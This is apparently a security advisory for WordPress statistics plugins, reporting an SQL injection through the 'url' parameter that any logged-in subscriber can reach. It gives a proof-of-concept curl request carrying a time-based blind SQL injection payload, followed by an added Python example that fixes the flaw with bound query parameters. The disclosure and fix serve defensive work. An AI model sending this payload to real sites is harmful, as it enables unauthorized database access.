Description

The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated user, such as a subscriber.
curl 'https://example.com/burst-statistics-endpoint.php' \
  -H 'content-type: text/plain;charset=UTF-8' \
  --data-raw $'"{\"fingerprint\":false,\"uid\":\"437a969907141c6c2042731efd2da038\",\"url\":\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\\",\\\"time_on_page\\\":6907,\\\"completed_goals\\\":[]}"' \
  --compressed
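Added example (not the plugins' code and not part of the original advisory): a hit-recording handler in Python with sqlite3 that decodes the double-encoded JSON body seen in the request above and hands url to the database as a bound parameter, so a quote inside it stays data. The table, function names and length limit are assumptions made for illustration; in WordPress the equivalent fix is `$wpdb->prepare()` with a `%s` placeholder.

```python
import json
import sqlite3
from urllib.parse import urlsplit

MAX_URL_LEN = 2048  # assumed limit for this example


def decode_hit(raw_body: str) -> dict:
    """Decode the tracking body: a JSON string that wraps a JSON object."""
    payload = json.loads(raw_body)
    if isinstance(payload, str):  # double-encoded, as in the request above
        payload = json.loads(payload)
    if not isinstance(payload, dict):
        raise ValueError("body is not a JSON object")
    return payload


def clean_url(value) -> str:
    """Accept only bounded http(s) URLs. This narrows input; it is not the SQL fix."""
    if not isinstance(value, str) or len(value) > MAX_URL_LEN:
        raise ValueError("url missing or too long")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("url is not http(s)")
    return value


def record_hit(db: sqlite3.Connection, raw_body: str) -> int:
    """Store one hit; url travels as a bound parameter, never as SQL text."""
    hit = decode_hit(raw_body)
    url = clean_url(hit.get("url"))
    seconds = int(hit.get("time_on_page", 0))
    cur = db.execute(
        "INSERT INTO hits (url, time_on_page) VALUES (?, ?)", (url, seconds)
    )
    return cur.lastrowid


def demo() -> list:
    """Run the handler on a constructed body whose url holds a quote."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE hits (id INTEGER PRIMARY KEY, url TEXT, time_on_page INTEGER)"
    )
    odd_url = "https://example.com/abc'/**/x"  # constructed sample value
    body = json.dumps(json.dumps({"url": odd_url, "time_on_page": 6907}))
    record_hit(db, body)
    return db.execute("SELECT url, time_on_page FROM hits").fetchall()
```

A single quote is a legal URL character, so `clean_url` cannot reject it; the placeholder in `record_hit` is what keeps the value out of the statement text.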